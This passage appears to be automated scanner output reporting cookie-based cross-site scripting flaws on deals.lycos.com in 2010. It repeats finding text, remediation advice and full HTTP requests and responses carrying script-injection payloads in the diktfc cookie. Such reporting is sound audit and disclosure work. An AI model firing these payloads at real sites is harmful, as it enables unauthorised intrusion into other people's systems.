HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:51 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:52 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47586
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/pc-computers-47&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A97fa0"><script>alert(1)</script>22b63eeca5d&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3e84"%3balert(1)//725b98a132d was submitted in the diktfc cookie. This input was echoed as b3e84";alert(1)//725b98a132d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/pc-computers-47 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab3e84"%3balert(1)//725b98a132d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:53 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:54 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47539
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92d65"%3balert(1)//18a8cd271fa was submitted in the diktfc cookie. This input was echoed as 92d65";alert(1)//18a8cd271fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/pets-221 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A92d65"%3balert(1)//18a8cd271fa; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:32 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:32 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28411
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89742"><script>alert(1)</script>b872a3a4dcc was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/pets-221 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A89742"><script>alert(1)</script>b872a3a4dcc; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:30 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:30 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28361
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/pets-221&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A89742"><script>alert(1)</script>b872a3a4dcc&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72d28"><script>alert(1)</script>cbdacb961cb was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/sports-and-fitness-211 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A72d28"><script>alert(1)</script>cbdacb961cb; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:40 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:40 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46511
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/sports-and-fitness-211&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A72d28"><script>alert(1)</script>cbdacb961cb&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b12d"%3balert(1)//42efa8c45f1 was submitted in the diktfc cookie. This input was echoed as 3b12d";alert(1)//42efa8c45f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/sports-and-fitness-211 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b12d"%3balert(1)//42efa8c45f1; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:42 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:42 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46480
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd261"><script>alert(1)</script>061e5deae73 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/televisions-159 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd261"><script>alert(1)</script>061e5deae73; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:50 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:51 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47998
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/televisions-159&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd261"><script>alert(1)</script>061e5deae73&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1fcd"%3balert(1)//17153ed5472 was submitted in the diktfc cookie. This input was echoed as d1fcd";alert(1)//17153ed5472 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/televisions-159 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad1fcd"%3balert(1)//17153ed5472; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:52 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:52 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 48716
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98c1d"><script>alert(1)</script>7cb04211ed3 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/travel-and-entertainment-206 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A98c1d"><script>alert(1)</script>7cb04211ed3; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:43 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 45931
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/travel-and-entertainment-206&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A98c1d"><script>alert(1)</script>7cb04211ed3&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68ab0"%3balert(1)//e4a4a2514b6 was submitted in the diktfc cookie. This input was echoed as 68ab0";alert(1)//e4a4a2514b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/travel-and-entertainment-206 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A68ab0"%3balert(1)//e4a4a2514b6; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:45 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:45 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 45908
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5bc0"><script>alert(1)</script>c7e153dfa56 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/stores HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac5bc0"><script>alert(1)</script>c7e153dfa56; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:14 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:14 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31882
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/stores&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac5bc0"><script>alert(1)</script>c7e153dfa56&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b302d"%3balert(1)//2f566655819 was submitted in the diktfc cookie. This input was echoed as b302d";alert(1)//2f566655819 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/stores HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab302d"%3balert(1)//2f566655819; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:15 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:15 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31852
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7962"><script>alert(1)</script>516615919cc was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/stores/6pm-1460 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab7962"><script>alert(1)</script>516615919cc; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:15 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:15 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25281
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/stores/6pm-1460&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab7962"><script>alert(1)</script>516615919cc&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5859"%3balert(1)//b6205f25b94 was submitted in the diktfc cookie. This input was echoed as f5859";alert(1)//b6205f25b94 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/stores/6pm-1460 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af5859"%3balert(1)//b6205f25b94; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:16 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:16 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25198
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd064"><script>alert(1)</script>f8d80f801a2 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/stores/best-buy-560 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd064"><script>alert(1)</script>f8d80f801a2; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
